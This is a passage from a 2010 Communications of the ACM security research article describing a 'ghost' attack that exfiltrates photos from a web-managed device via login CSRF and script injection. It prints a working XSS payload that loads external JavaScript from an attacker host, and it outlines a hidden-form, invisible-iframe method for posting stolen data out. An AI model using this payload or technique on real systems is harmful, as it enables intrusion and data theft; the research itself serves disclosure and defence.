Communications - August 2010

Phase 1: infection
Port scan
Login CSRF
Ghost injection
Phase 2: execution
Inject payload
Fetch data
Post data

figure 9. The ghost in action: a photo has just been exfiltrated.

execution: The four challenges we faced in implementing a ghost designed to exfiltrate data were:

1. payload size: The size of the payload that can be injected is limited.

110 communicaTionS of The acm | auGust 2010 | Vol. 53 | no. 8

2. Javascript errors: The code must not trigger a single JavaScript error, otherwise the browser will stop the execution, preventing the exfiltration.

3. Fetching data: We had to find a way to fetch binary data. This is not supported directly by XMLHTTPRequest.

4. exfiltrating data: Once the data was loaded in memory, we had to exfiltrate it while keeping the regular frame code running.

The first challenge was addressed by using a loader: the injected code is not the ghost itself but rather a payload that will ask the browser to load the ghost as an external JavaScript.

The second challenge was more difficult because the injected ghost is reflected in the middle of a JavaScript function in the variable name. Therefore the following payload was injected to the frame:

name “; }</script> <script src=“http://www/g.js”> </script><script> function n() {var frame Name =”

This payload is designed to close the variable, the function and the script, request the ghost as a new script and resume the function. Resuming was required because otherwise the frame control would have been broken.

To deal with the third and fourth challenges which are closely related, we had to come up with a new method that uses AJAX tricks and a manipulation of the XMLHTTPRequest object in a novel way. The sketch of the code used as a ghost is depicted below:

injectIFrame(); redirectPost(); data = fetch(page); data = decode(data); data = rencode(data); post(data); Reload();

This code works as follows: first it injects in the page an invisible form named f (used to post exfiltrated data) and an iframe named uploadtarget into the Web page (line 1). This iframe is used to take advantage of the ability to control through JavaScript the iframe in which the form f action will be executed. Accordingly the second step of the ghost (line 2) is to redirect the form f action to our invisible iframe by using the following JavaScript command: document.f.target = ‘upload_target’;. Posting into the iframe is mandatory to prevent the redirection of the entire page that will break the exfiltration loop and alert the user. Note that the same origin policy—the mechanism which protects the user’s session to a legitimate Web site from being exploited by a different, malicious Web site11—is not an issue here as posting data from the legitimate site to the malicious one goes in the opposite direction and is currently fully unrestricted: